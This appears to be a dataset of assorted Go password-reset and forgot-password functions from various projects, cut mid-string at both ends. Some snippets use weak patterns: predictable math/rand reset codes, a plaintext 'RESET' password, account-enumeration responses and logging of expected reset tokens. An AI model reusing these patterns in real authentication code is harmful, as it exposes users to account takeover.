{\n\t\tfmt.Println(\"Sending mail is broken srry\")\n\t\treturn\n\t}\n}", "func (env *Env) ResetUserPassword(c *gin.Context) {\n\n\ttype resetUserPasswordRequest struct {\n\t\tResetCode string `json:\"reset_code\"`\n\t}\n\n\t//decode request body\n\tjsonData, err := ioutil.ReadAll(c.Request.Body)\n\tif err != nil {\n\t\tLog.WithField(\"module\", \"handler\").WithError(err)\n\t\tc.AbortWithStatusJSON(http.StatusBadRequest, errs.RQST001)\n\t\treturn\n\t}\n\n\tvar request resetUserPasswordRequest\n\terr = json.Unmarshal(jsonData, &request)\n\tif err != nil {\n\t\tLog.WithField(\"module\", \"handler\").WithError(err)\n\t\tc.AbortWithStatusJSON(http.StatusBadRequest, errs.RQST001)\n\t\treturn\n\t}\n\n\tvar user mysql.User\n\tuser.Username = c.Param(\"username\")\n\tuser.ResetCode = request.ResetCode\n\n\tvar exists int64\n\n\t//Check if Username exists in Database\n\tresult := env.db.Model(&user).Where(\"upper(username) = upper(?)\", user.Username).Count(&exists)\n\tif result.Error != nil {\n\t\tLog.WithField(\"module\", \"sql\").WithError(result.Error)\n\t\tc.AbortWithStatusJSON(http.StatusInternalServerError, errs.DBSQ001)\n\t\treturn\n\t}\n\n\tif exists == 0 {\n\t\tLog.WithField(\"module\", \"handler\").Error(\"Username not found in Database\")\n\t\tc.AbortWithStatusJSON(http.StatusNotFound, errs.AUTH006)\n\t\treturn\n\t}\n\n\t//Check Database if ResetCode is correct\n\tresult = env.db.Where(\"upper(username) = upper(?) and reset_code = ?\", user.Username, user.ResetCode).First(&user)\n\tif result.Error != nil {\n\t\tif errors.Is(result.Error, gorm.ErrRecordNotFound) {\n\t\t\tLog.WithField(\"module\", \"handler\").Error(\"ResetCode Username combination not found (incorrect)\")\n\t\t\tc.AbortWithStatusJSON(http.StatusUnauthorized, errs.AUTH007)\n\t\t\treturn\n\t\t} else {\n\t\t\tLog.WithField(\"module\", \"sql\").WithError(result.Error)\n\t\t\tc.AbortWithStatusJSON(http.StatusInternalServerError, errs.DBSQ001)\n\t\t\treturn\n\t\t}\n\t}\n\n\t//Reset Password in Database\n\tuser.Password = \"RESET\"\n\tuser.PasswordReset = true\n\tresult = env.db.Save(&user)\n\tif result.Error != nil {\n\t\tLog.WithField(\"module\", \"sql\").WithError(result.Error)\n\t\tc.AbortWithStatusJSON(http.StatusInternalServerError, errs.DBSQ004)\n\t\treturn\n\t}\n}", "func (u UserResource) sendTempPassword(request *restful.Request, response *restful.Response) {\n\temail := request.PathParameter(\"email\")\n\tusr := User{Email: email}\n\tnew_password := Tools.RandString(8)\n\n\tif has, err := db.Engine.Table(\"user\").Where(\"email=?\", email).Get(&usr); err != nil {\n\t\tlog.Error(err)\n\t} else if has {\n\t\tusr.Password = Tools.EncodePassword(new_password)\n\t\tif _, err = db.Engine.Id(usr.ID).Update(usr); err != nil {\n\t\t\tlog.Error(err)\n\t\t}\n\t}\n\tTools.SendPassword(usr.Email, new_password)\n}", "func SendResetLink() echo.HandlerFunc {\n\treturn emailRequired(\n\t\tfunc(context echo.Context) error {\n\t\t\temail := context.FormValue(\"email\")\n\t\t\tuser, err := FindByEmail(email)\n\t\t\tif err != nil || user == nil {\n\t\t\t\tlog.Println(err)\n\t\t\t\treturn context.JSON(http.StatusNotFound, errors.New(\"Cannot find user for email \"+email))\n\t\t\t}\n\t\t\tuser.ResetToken = auth.GetResetToken(email)\n\t\t\terr = Save(user)\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(err)\n\t\t\t\treturn context.JSON(http.StatusInternalServerError, errors.New(\"Cannot save password reset token for user \"+email))\n\t\t\t}\n\n\t\t\tdata := passwordResetData{config.NoReplyAddress, email, config.HostName, config.HostPort, user.ResetToken, time.Now().String(), randomString(16)}\n\t\t\temailTemplateTree := template.New(\"resetEmailTemplate\")\n\t\t\temailTemplateCollection := template.Must(emailTemplateTree.ParseFiles(\"src/bleuvanille/templates/PasswordReset.email\"))\n\n\t\t\tvar emailBody = new(bytes.Buffer)\n\n\t\t\tt := emailTemplateCollection.Templates()[0]\n\n\t\t\terr = t.Execute(emailBody, data)\n\n\t\t\terr = mail.Send(email, emailBody.Bytes())\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(err)\n\t\t\t\treturn context.JSON(http.StatusInternalServerError, errors.New(\"Cannot send password reset email to user \"+email))\n\t\t\t}\n\n\t\t\treturn context.JSON(http.StatusOK, \"Password reset email sent to \"+email)\n\t\t})\n}", "func (s *UserService) ResetPasswordInit(req *requests.ResetPasswordInit) *response.Base {\n\t//validate user input\n\tif err := req.Validate(); err != nil {\n\t\treturn &response.Base{\n\t\t\tCode: http.StatusBadRequest,\n\t\t\tError: err,\n\t\t\tMessage: \"\",\n\t\t}\n\t}\n\t//check if user exists\n\tuser, err := s.dao.Find(req.Identifier)\n\tif err != nil {\n\t\tlog.Printf(\"user %s not found\\n\", req.Identifier)\n\t\treturn &response.Base{\n\t\t\tCode: http.StatusNotFound,\n\t\t\tError: errors.New(\"user_not_found\"),\n\t\t}\n\t}\n\t//generate reset password code\n\tvar code string\n\tif requests.ValidateEmailAddress(req.Identifier) {\n\t\tcode, tries := \"\", 0\n\t\tfor len(code) < 6 && tries < 3 {\n\t\t\t//generate 6 digits code\n\t\t\tcode = fmt.Sprintf(\"%d\", rand.New(rand.NewSource(time.Now().UnixNano())).Intn(999999))\n\t\t\ttries++\n\t\t}\n\t\tif len(code) != 6 {\n\t\t\treturn &response.Base{\n\t\t\t\tCode: http.StatusInternalServerError,\n\t\t\t\tError: errors.New(\"unknown_error\"),\n\t\t\t}\n\t\t}\n\t\t//send the code to user in email\n\t\tmailer := mails.ResetPasswordEmail{\n\t\t\tTo: user.Email,\n\t\t\tName: user.Name,\n\t\t\tCode: code,\n\t\t}\n\t\tmailer.Send()\n\t} else {\n\t\terr := auth.Get(req.Identifier).Err()\n\t\tif err == nil {\n\t\t\treturn &response.Base{\n\t\t\t\tCode: http.StatusTooManyRequests,\n\t\t\t\tError: errors.New(\"too_many_requests\"),\n\t\t\t}\n\t\t}\n\t\tcode, err = helpers.SendOTP(req.Identifier)\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\t\tauth.Set(req.Identifier, code, time.Second*60)\n\t}\n\n\tif err := auth.Set(fmt.Sprintf(\"%d\", user.ID), code, time.Hour); err != nil {\n\t\tlog.Println(err)\n\t}\n\n\treturn &response.Base{\n\t\tCode: http.StatusOK,\n\t\tError: nil,\n\t\tMessage: \"reset_instructions_sent\",\n\t}\n}", "func (p *politeiawww) processResetPassword(rp www.ResetPassword) (*www.ResetPasswordReply, error) {\n\tlog.Tracef(\"processResetPassword: %v\", rp.Username)\n\tvar (\n\t\twg sync.WaitGroup\n\t\tch = make(chan resetPasswordResult)\n\t)\n\n\t// Wait for both go routines to finish before returning the\n\t// reply. This is done to prevent an attacker from being able\n\t// to execute a timing attack to determine if the provided\n\t// email address is the user's valid email address.\n\twg.Add(2)\n\tgo func() {\n\t\tdefer wg.Done()\n\t\tch <- p.resetPassword(rp)\n\t}()\n\tgo func() {\n\t\tdefer wg.Done()\n\t\ttime.Sleep(resetPasswordMinWaitTime)\n\t}()\n\trpr := <-ch\n\twg.Wait()\n\n\treturn &rpr.reply, rpr.err\n}", "func requestResetHandler(w http.ResponseWriter, r *http.Request) {\n\tctx := context.Background()\n\tif b.authenticator == nil {\n\t\tvar err error\n\t\tb.authenticator, err = initAuth(ctx)\n\t\tif err != nil {\n\t\t\tlog.Print(\"requestResetHandler authenticator could not be initialized\")\n\t\t\thttp.Error(w, \"Server error\", http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t}\n\temail := r.PostFormValue(\"Email\")\n\tresult := b.authenticator.RequestPasswordReset(ctx, email)\n\tif result.RequestResetSuccess {\n\t\terr := identity.SendPasswordReset(result.User, result.Token, b.webConfig)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"requestResetHandler: could not send password reset: %v\", err)\n\t\t\tresult.RequestResetSuccess = false\n\t\t}\n\t}\n\tif strings.Contains(r.Header.Get(\"Accept\"), \"application/json\") {\n\t\tsendJSON(w, result)\n\t} else {\n\t\ttitle := b.webConfig.GetVarWithDefault(\"Title\", defTitle)\n\t\tcontent := htmlContent{\n\t\t\tTitle: title,\n\t\t\tErrorMsg: \"\",\n\t\t\tTMResults: nil,\n\t\t\tData: result,\n\t\t}\n\t\tb.pageDisplayer.DisplayPage(w, \"request_reset_form.html\", content)\n\t}\n}", "func (UserSvc *UserSvc) ForgotPassword(ctx context.Context, req *pb.ForgotPasswordReq) (*pb.ForgotPasswordRes, error) {\n\tconn, err := grpc.Dial(UserSvc.serverURL, grpc.WithInsecure())\n\tif err != nil {\n\t\treturn nil, errs.GRPCDialError(err)\n\t}\n\tdefer conn.Close()\n\tclient := pb.NewUserSvcClient(conn)\n\tres, err := client.ForgotPassword(ctx, req)\n\tif err != nil {\n\t\treturn nil, errs.WithMessage(err, \"client.ForgotPassword\")\n\t}\n\treturn res, nil\n}", "func ResetPasswordCheck(w http.ResponseWriter, r *http.Request, ps httprouter.Params) {\n\tw.Header().Add(\"Content-Type\", \"application/json\")\n\tresetToken := ps.ByName(\"reset-token\")\n\n\t// check if user with such token exists and if it has expired\n\tuser := &models.User{}\n\terr := models.DB().Table(\"users\").Where(\"token_reset = ? AND token_reset_expires > ?\", resetToken, time.Now()).First(user).Error\n\tif err != nil {\n\t\tif err == gorm.ErrRecordNotFound {\n\t\t\tresp := map[string]interface{}{\n\t\t\t\t\"status\": false,\n\t\t\t\t\"message\": \"Either your reset token doesn't exist or it has expired\",\n\t\t\t}\n\t\t\tjson.NewEncoder(w).Encode(resp)\n\t\t\treturn\n\t\t}\n\n\t\tresp := map[string]interface{}{\n\t\t\t\"status\": false,\n\t\t\t\"message\": \"DB error\",\n\t\t}\n\t\tjson.NewEncoder(w).Encode(resp)\n\t\treturn\n\t}\n\n\t// check if token is valid\n\tjwtT := &models.JwtToken{}\n\ttoken, err := jwt.ParseWithClaims(resetToken, jwtT, func(token *jwt.Token) (interface{}, error) {\n\t\treturn []byte(os.Getenv(\"jwt_secret\")), nil\n\t})\n\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusForbidden)\n\t\tresp := map[string]interface{}{\n\t\t\t\"status\": false,\n\t\t\t\"message\": \"Malformed token\",\n\t\t}\n\t\tjson.NewEncoder(w).Encode(resp)\n\t\treturn\n\t}\n\n\tif !token.Valid {\n\t\tw.WriteHeader(http.StatusForbidden)\n\t\tresp := map[string]interface{}{\n\t\t\t\"status\": false,\n\t\t\t\"message\": \"Invalid token\",\n\t\t}\n\t\tjson.NewEncoder(w).Encode(resp)\n\t\treturn\n\t}\n\tuser.Password = \"\"\n\tresp := map[string]interface{}{\n\t\t\"status\": true,\n\t\t\"message\": \"Token is valid, you can change your password!\",\n\t\t\"user\": user,\n\t}\n\tjson.NewEncoder(w).Encode(resp)\n}", "func (s Service) RecoverPassword(ctx context.Context, code, userID, password string) error {\n\tspan := s.tracer.MakeSpan(ctx, \"RecoverPassword\")\n\tdefer span.Finish()\n\n\tmatched, err := s.repository.Cache.CheckTemporaryCodeForRecoveryByEmail(userID, code)\n\tif err != nil {\n\t\ts.tracer.LogError(span, err)\n\t}\n\tif !matched {\n\t\treturn errors.New(\"wrong_activation_code\")\n\t}\n\n\t// encrypting password\n\tpass, err := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)\n\tif err != nil {\n\t\ts.tracer.LogError(span, err)\n\t\t// internal error\n\t}\n\n\terr = s.repository.Users.ChangePassword(ctx, userID, string(pass))\n\tif err != nil {\n\t\ts.tracer.LogError(span, err)\n\t\t// internal error\n\t}\n\n\terr = s.repository.Cache.Remove(userID)\n\tif err != nil {\n\t\ts.tracer.LogError(span, err)\n\t}\n\n\treturn nil\n}", "func PasswordResetPostHandler(ctx *enliven.Context) {\n\tcode, ok := ctx.Vars[\"code\"]\n\tif !ok || code == \"\" {\n\t\tctx.Forbidden()\n\t\treturn\n\t}\n\n\tdb := database.GetDatabase()\n\tu := User{}\n\tdb.Where(\"Verification_Code = ?\", code).First(&u)\n\n\tif u.ID == 0 {\n\t\tctx.Forbidden()\n\t\treturn\n\t}\n\n\tctx.Request.ParseForm()\n\t// TODO: Reset the user's password to the posted values here.\n\n\tu.Status = 1\n\tu.VerificationCode = \"\"\n\tdb.Save(&u)\n\n\tctx.ExecuteBaseTemplate(\"user_password_reset\")\n}", "func (p *politeiawww) processVerifyResetPassword(vrp www.VerifyResetPassword) (*www.VerifyResetPasswordReply, error) {\n\tlog.Tracef(\"processVerifyResetPassword: %v %v\",\n\t\tvrp.Username, vrp.VerificationToken)\n\n\t// Lookup user\n\tu, err := p.db.UserGetByUsername(vrp.Username)\n\tif err != nil {\n\t\tif err == user.ErrUserNotFound {\n\t\t\terr = www.UserError{\n\t\t\t\tErrorCode: www.ErrorStatusUserNotFound,\n\t\t\t}\n\t\t}\n\t\treturn nil, err\n\t}\n\n\t// Validate verification token\n\ttoken, err := hex.DecodeString(vrp.VerificationToken)\n\tif err != nil {\n\t\tlog.Debugf(\"processVerifyResetPassword: decode hex '%v': %v\",\n\t\t\tvrp.VerificationToken, err)\n\t\treturn nil, www.UserError{\n\t\t\tErrorCode: www.ErrorStatusVerificationTokenInvalid,\n\t\t}\n\t}\n\tif !bytes.Equal(token, u.ResetPasswordVerificationToken) {\n\t\tlog.Debugf(\"processVerifyResetPassword: wrong token: %v %v\",\n\t\t\thex.EncodeToString(token),\n\t\t\thex.EncodeToString(u.ResetPasswordVerificationToken))\n\t\treturn nil, www.UserError{\n\t\t\tErrorCode: www.ErrorStatusVerificationTokenInvalid,\n\t\t}\n\t}\n\tif u.ResetPasswordVerificationExpiry < time.Now().Unix() {\n\t\tlog.Debugf(\"processVerifyResetPassword: token expired: %v %v\",\n\t\t\tu.ResetPasswordVerificationExpiry, time.Now().Unix())\n\t\treturn nil, www.UserError{\n\t\t\tErrorCode: www.ErrorStatusVerificationTokenExpired,\n\t\t}\n\t}\n\n\t// The client should be hashing the password before sending\n\t// it to politeiawww. This validation is only relevant if the\n\t// client failed to hash the password or does not include a\n\t// password in the request.\n\terr = validatePassword(vrp.NewPassword)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Hash the new password\n\thashedPassword, err := p.hashPassword(vrp.NewPassword)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Update the user\n\tu.ResetPasswordVerificationToken = nil\n\tu.ResetPasswordVerificationExpiry = 0\n\tu.HashedPassword = hashedPassword\n\tu.FailedLoginAttempts = 0\n\n\terr = p.db.UserUpdate(*u)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &www.VerifyResetPasswordReply{}, nil\n}", "func (u *UserController) PasswordReset(c *gin.Context) {\n\tvar data forms.PasswordResetCommand\n\n\tif c.BindJSON(&data) != nil {\n\t\tc.JSON(406, gin.H{\"message\": \"Provide relevant fields\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\n\tif data.Password != data.Confirm {\n\t\tc.JSON(400, gin.H{\"message\": \"Passwords do not match\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\n\tresetToken, _ := c.GetQuery(\"reset_token\")\n\n\tuserID, _ := services.DecodeNonAuthToken(resetToken)\n\n\tresult, err := userModel.GetUserByEmail(userID)\n\n\tif err != nil {\n\t\t// Return response when we get an error while fetching user\n\t\tc.JSON(500, gin.H{\"message\": \"Something wrong happened, try again later\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\n\tif result.Email == \"\" {\n\t\tc.JSON(404, gin.H{\"message\": \"User accoun was not found\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\t// Hash the new password\n\tnewHashedPassword := helpers.GeneratePasswordHash([]byte(data.Password))\n\n\t// Update user account\n\t_err := userModel.UpdateUserPass(userID, newHashedPassword)\n\n\tif _err != nil {\n\t\t// Return response if we are not able to update user password\n\t\tc.JSON(500, gin.H{\"message\": \"Somehting happened while updating your password try again\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\n\tc.JSON(201, gin.H{\"message\": \"Password has been updated, log in\"})\n\tc.Abort()\n\treturn\n}", "func ForgotPasswordHandler(repo UpdatePasswordOrganizationRepository, mailer mail.Mailer, jm *JWTManager) func(w http.ResponseWriter, r *http.Request) {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\tvar handlerForm map[string]string\n\n\t\terr := requestToJSONObject(r, &handlerForm)\n\t\tif err != nil {\n\t\t\tHandleHTTPError(w, http.StatusBadRequest, err)\n\t\t\treturn\n\t\t}\n\n\t\torganization, err := repo.GetByEmail(handlerForm[\"email\"])\n\t\tif organization == nil {\n\t\t\tHandleHTTPError(w, http.StatusUnauthorized, errors.New(\"Não há organização com este email\"))\n\t\t\treturn\n\t\t}\n\n\t\tp := []string{model.PasswordResetPermission}\n\t\ttoken, err := jm.CreateToken(organization.User, &p)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\n\t\temailParams := mail.EmailParams{\n\t\t\tTo: organization.User.Email,\n\t\t\tSubject: \"Esqueci minha senha\",\n\t\t\tTemplate: mail.ForgotPasswordTemplate,\n\t\t\tVariables: map[string]string{\n\t\t\t\t\"name\": organization.Name,\n\t\t\t\t\"link\": os.Getenv(\"FRONTEND_URL\") + \"/recover-password/\" + token,\n\t\t\t},\n\t\t}\n\n\t\tif err := mailer.SendEmail(emailParams); err != nil {\n\t\t\tHandleHTTPError(w, http.StatusBadRequest, errors.New(\"Falha ao enviar o email\"))\n\t\t\treturn\n\t\t}\n\n\t\tHandleHTTPSuccessNoContent(w)\n\t}\n}", "func SendResetLink(ctx context.Context, email, link string) error {\n\tif utils.IsDev(ctx) {\n\t\treturn nil\n\t}\n\tm := gomail.NewMessage()\n\tm.SetHeader(\"From\", config.GetConfig().Mail.Username)\n\tm.SetHeader(\"To\", email)\n\tm.SetHeader(\"Subject\", \"来自AirBox的重置密码申请!\")\n\tcontent := \"<!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\">\\n\" +\n\t\t\"<html lang=\\\"en\\\">\\n\" +\n\t\t\"<head>\\n\" +\n\t\t\" <meta charset=\\\"UTF-8\\\">\\n\" +\n\t\t\" <title>来自<a href=\\\"\\\">AirBox</a>的重置密码申请</title>\\n\" +\n\t\t\" <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"/>\\n\" +\n\t\t\"</head>\\n\" +\n\t\t\"<body style=\\\"padding: 0;\\\">\\n\" +\n\t\t\"<table width=\\\"700\\\" border=\\\"0\\\" align=\\\"center\\\" cellspacing=\\\"0\\\" style=\\\"width:700px;\\\">\\n\" +\n\t\t\" <tbody>\\n\" +\n\t\t\" <tr>\\n\" +\n\t\t\" <td>\\n\" +\n\t\t\" <div style=\\\"width:680px;padding:0 10px;margin:0 auto;\\\">\\n\" +\n\t\t\" <div style=\\\"line-height:1.5;font-size:14px;margin-bottom:25px;color:#4d4d4d;\\\">\\n\" +\n\t\t\" <strong style=\\\"display:block;margin-bottom:15px;\\\">\\n\" +\n\t\t\" 亲爱的用户:\\n\" +\n\t\t\" <span style=\\\"color:rgb(129, 65, 134);font-size: 16px;\\\">\" + email + \"</span>\\n\" +\n\t\t\" </strong>\\n\" +\n\t\t\" <strong style=\\\"display:block;margin-bottom:15px;\\\">\\n\" +\n\t\t\" 您重置密码的链接是:\\n\" +\n\t\t\" <span style=\\\"font-size: 12px\\\"><br>\" +\n\t\t\" <a style=\\\"color: #ff0000\\\" href=\\\"\" + link + \"\\\">\" + link + \"</a>\" +\n\t\t\" </span>\\n\" +\n\t\t\" </strong>\\n\" +\n\t\t\" </div>\\n\" +\n\t\t\" <div style=\\\"margin-bottom:30px;\\\">\\n\" +\n\t\t\" <small style=\\\"display:block;margin-bottom:20px;font-size:12px;\\\">\\n\" +\n\t\t\" <p style=\\\"color:#747474;\\\">\\n\" +\n\t\t\" 注意:此操作会泄露您的密码。如非本人操作,请及时登录并修改密码以保证帐户安全\\n\" +\n\t\t\" </p>\\n\" +\n\t\t\" </small>\\n\" +\n\t\t\" </div>\\n\" +\n\t\t\" </div>\\n\" +\n\t\t\" </td>\\n\" +\n\t\t\" </tr>\\n\" +\n\t\t\" </tbody>\\n\" +\n\t\t\"</table>\\n\" +\n\t\t\"</body>\\n\" +\n\t\t\"</html>\"\n\tm.SetBody(\"text/html\", content)\n\treturn pkg.GetMail().DialAndSend(m)\n}", "func RecycleToken(w http.ResponseWriter, r *http.Request) {\n\tlog.Println(\"Received a PATCH. Will recycle token if request is valid.\")\n\n}", "func PasswordResetGetHandler(ctx *enliven.Context) {\n\tcode, ok := ctx.Vars[\"code\"]\n\tif !ok || code == \"\" {\n\t\tctx.Forbidden()\n\t\treturn\n\t}\n\n\tdb := database.GetDatabase()\n\tu := User{}\n\tdb.Where(\"Verification_Code = ?\", code).First(&u)\n\n\tif u.ID == 0 {\n\t\tctx.Forbidden()\n\t\treturn\n\t}\n\n\tctx.ExecuteBaseTemplate(\"user_password_reset\")\n}", "func (ar *Router) RequestTFAReset() http.HandlerFunc {\n\ttype requestBody struct {\n\t\tEmail string `json:\"email,omitempty\"`\n\t}\n\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\td := requestBody{}\n\t\tif ar.MustParseJSON(w, r, &d) != nil {\n\t\t\treturn\n\t\t}\n\n\t\tif !model.EmailRegexp.MatchString(d.Email) {\n\t\t\tar.Error(w, ErrorAPIRequestBodyInvalid, http.StatusBadRequest, \"\", \"RequestTFAReset.emailRegexp_MatchString\")\n\t\t\treturn\n\t\t}\n\n\t\tif userExists := ar.userStorage.UserExists(d.Email); !userExists {\n\t\t\tar.Error(w, ErrorAPIUserNotFound, http.StatusBadRequest, \"User with this email does not exist\", \"RequestTFAReset.UserExists\")\n\t\t\treturn\n\t\t}\n\n\t\tuserID, err := ar.userStorage.IDByName(d.Email)\n\t\tif err != nil {\n\t\t\tar.Error(w, ErrorAPIUserNotFound, http.StatusBadRequest, err.Error(), \"RequestTFAReset.IDByName\")\n\t\t\treturn\n\t\t}\n\n\t\tapp := middleware.AppFromContext(r.Context())\n\t\tif app == nil {\n\t\t\tar.Error(w, ErrorAPIRequestAppIDInvalid, http.StatusBadRequest, \"App is not in context.\", \"RequestDisabledTFA.AppFromContext\")\n\t\t\treturn\n\t\t}\n\n\t\tif app.TFAStatus() == model.TFAStatusDisabled {\n\t\t\tar.Error(w, ErrorAPIRequestDisabledTFA, http.StatusForbidden, \"Two-factor authentication is disabled for this app\", \"RequestTFAReset.TFAStatusDisabled\")\n\t\t\treturn\n\t\t}\n\n\t\tresetToken, err := ar.tokenService.NewResetToken(userID)\n\t\tif err != nil {\n\t\t\tar.Error(w, ErrorAPIAppResetTokenNotCreated, http.StatusInternalServerError, err.Error(), \"RequestTFAReset.NewResetToken\")\n\t\t\treturn\n\t\t}\n\n\t\tresetTokenString, err := ar.tokenService.String(resetToken)\n\t\tif err != nil {\n\t\t\tar.Error(w, ErrorAPIAppResetTokenNotCreated, http.StatusInternalServerError, err.Error(), \"RequestTFAReset.tokenService_String\")\n\t\t\treturn\n\t\t}\n\n\t\thost, err := url.Parse(ar.Host)\n\t\tif err != nil {\n\t\t\tar.Error(w, ErrorAPIInternalServerError, http.StatusInternalServerError, err.Error(), \"RequestTFAReset.URL_parse\")\n\t\t\treturn\n\t\t}\n\n\t\tquery := fmt.Sprintf(\"token=%s\", resetTokenString)\n\n\t\tu := &url.URL{\n\t\t\tScheme: host.Scheme,\n\t\t\tHost: host.Host,\n\t\t\tPath: path.Join(ar.WebRouterPrefix, \"tfa/reset\"),\n\t\t\tRawQuery: query,\n\t\t}\n\n\t\tif err = ar.emailService.SendResetEmail(\"Reset Two-Factor Authentication\", d.Email, u.String()); err != nil {\n\t\t\tar.Error(w, ErrorAPIEmailNotSent, http.StatusInternalServerError, \"Email sending error: \"+err.Error(), \"RequestTFAReset.SendResetEmail\")\n\t\t\treturn\n\t\t}\n\n\t\tresult := map[string]string{\"result\": \"ok\"}\n\t\tar.ServeJSON(w, http.StatusOK, result)\n\t}\n}", "func (c *RegistrationController) ResetPassword(w http.ResponseWriter, r *http.Request) {\n\n\t// parse the form value\n\tif err := r.ParseForm(); err != nil {\n\t\tlog.Println(err)\n\t\tc.Error500(w, err, \"Parsing form values failed.\")\n\t\treturn\n\t}\n\n\tdisplayedError := \"Error resetting password\"\n\n\tuserEmail := r.FormValue(\"userEmail\")\n\tu, err := models.FindUserByEmail(userEmail)\n\tif err != nil {\n\t\tlog.Println(err)\n\t\tc.BadRequest(w, err, displayedError)\n\t\treturn\n\t}\n\n\tif err = u.ResetUUID(); err != nil {\n\t\tlog.Printf(\"Error resetting UUID for user %v: %v\", u.Email, err)\n\t\tc.BadRequest(w, err, displayedError)\n\t\treturn\n\t}\n\tif err = u.UpdatePassword(\"\"); err != nil {\n\t\tlog.Printf(\"Error resetting password for user %v: %v\", u.Email, err)\n\t\tc.BadRequest(w, err, displayedError)\n\t\treturn\n\t}\n\tdata := email.MailData{\n\t\tFirstName: u.FirstName,\n\t\tLastName: u.LastName,\n\t\tHostAddress: config.HTTPHostAddress,\n\t\tVerificationUUID: u.VerificationUUID,\n\t}\n\tif err = email.ConstructFromTemplateAndSend(\n\t\t\"password_reset.html\",\n\t\t\"[SCIONLab] Password reset\",\n\t\tdata,\n\t\t\"password-reset\",\n\t\tuserEmail,\n\t\tfalse); err != nil {\n\t\tlog.Printf(\"Error sending password-reset email to user %v: %v\", u.Email, err)\n\t\tc.BadRequest(w, err, displayedError)\n\t\treturn\n\t}\n\n\treturn\n}", "func (handler *Handler) handlePasswordResetGet(w http.ResponseWriter, r *http.Request) {\n\n\t//Now get the email that was passed in\n\tkeys, ok := r.URL.Query()[\"email\"]\n\n\t//Only take the first one\n\tif !ok || len(keys[0]) < 1 {\n\t\tutils.ReturnJsonStatus(w, http.StatusUnprocessableEntity, false, \"password_change_missing_email\")\n\t}\n\n\t//Get the email\n\temail := keys[0]\n\n\t//Look up the user\n\tuser, err := handler.userHelper.GetUserByEmail(email)\n\n\t//If there is an error just return, we don't want people to know if there was an email here\n\tif err != nil {\n\t\tutils.ReturnJsonStatus(w, http.StatusOK, true, \"password_change_request_received\")\n\t\treturn\n\t}\n\n\t//Now issue a request\n\terr = handler.userHelper.IssueResetRequest(handler.userHelper.passwordHelper.TokenGenerator(), user.Id(), user.Email())\n\n\t//There was a real error return\n\tif err != nil {\n\t\tutils.ReturnJsonError(w, http.StatusNotFound, err)\n\t\treturn\n\t}\n\n\t//Now just return\n\tutils.ReturnJsonStatus(w, http.StatusOK, true, \"password_change_request_received\")\n\n}", "func (m *UserResource) ForgotPasswordGenerateOneTimeToken(ctx context.Context, userId string, qp *query.Params) (*ForgotPasswordResponse, *Response, error) {\n\turl := fmt.Sprintf(\"/api/v1/users/%v/credentials/forgot_password\", userId)\n\tif qp != nil {\n\t\turl = url + qp.String()\n\t}\n\n\trq := m.client.CloneRequestExecutor()\n\n\treq, err := rq.WithAccept(\"application/json\").WithContentType(\"application/json\").NewRequest(\"POST\", url, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar forgotPasswordResponse *ForgotPasswordResponse\n\n\tresp, err := rq.Do(ctx, req, &forgotPasswordResponse)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn forgotPasswordResponse, resp, nil\n}", "func userUpdatedPassword(res http.ResponseWriter, req *http.Request) {\r\n\tfmt.Println(\"Htmlmain.userUpdatedPassword\")\r\n\r\n\tData := struct {\r\n\t\tPageName string\r\n\t\tUserName string\r\n\t\tMsgToUser string\r\n\t}{PageName: \"Updated Password\"}\r\n\r\n\tmyCookie, err := req.Cookie(\"CRA\")\r\n\tif err != nil {\r\n\t\thttp.Redirect(res, req, \"/logIn\", http.StatusSeeOther)\r\n\t} else {\r\n\t\tData.UserName = mapSessions[myCookie.Value]\r\n\t}\r\n\tif req.Method == http.MethodPost {\r\n\t\t//get user name and current password\r\n\t\tusername := req.FormValue(\"username\")\r\n\t\tpassword := req.FormValue(\"oldpassword\")\r\n\t\t//get user new password and confirm the new password\r\n\t\tnewpassword := req.FormValue(\"newpassword\")\r\n\t\tconfirmpassword := req.FormValue(\"confirmpassword\")\r\n\t\t_, mOk := ctms.ExistingCustomer(username)\r\n\t\tpOk := ctms.PasswordMatched(username, password)\r\n\t\tfmt.Println(\"here\")\r\n\t\tfmt.Println(username, password, mOk, pOk)\r\n\t\tif !mOk || !pOk {\r\n\t\t\tData.MsgToUser = \"The user name and password is not match! \"\r\n\t\t\tdefer fmt.Fprintf(res, \"<br><script>document.getElementById('MsgToUser').innerHTML = '%v';</script>\", Data.MsgToUser)\r\n\t\t\t// http.Redirect(res, req, \"/changepassword\", http.StatusSeeOther)\r\n\t\t} else if newpassword != confirmpassword {\r\n\t\t\tData.MsgToUser = \"New password and confrim password is not same!\"\r\n\t\t\tdefer fmt.Fprintf(res, \"<br><script>document.getElementById('MsgToUser').innerHTML = '%v';</script>\", Data.MsgToUser)\r\n\t\t\t// http.Redirect(res, req, \"/changepassword\", http.StatusSeeOther)\r\n\t\t} else if username == \"\" || password == \"\" {\r\n\t\t\tData.MsgToUser = \"Please insert username and password for verification!\"\r\n\t\t\tdefer fmt.Fprintf(res, \"<br><script>document.getElementById('MsgToUser').innerHTML = '%v';</script>\", Data.MsgToUser)\r\n\t\t} else {\r\n\t\t\tctms.ChangePassword(username, newpassword)\r\n\t\t\tData.MsgToUser = \"Password is updated!\"\r\n\t\t\tdefer fmt.Fprintf(res, \"<h4 class='Application'><a href='/menu'>Main 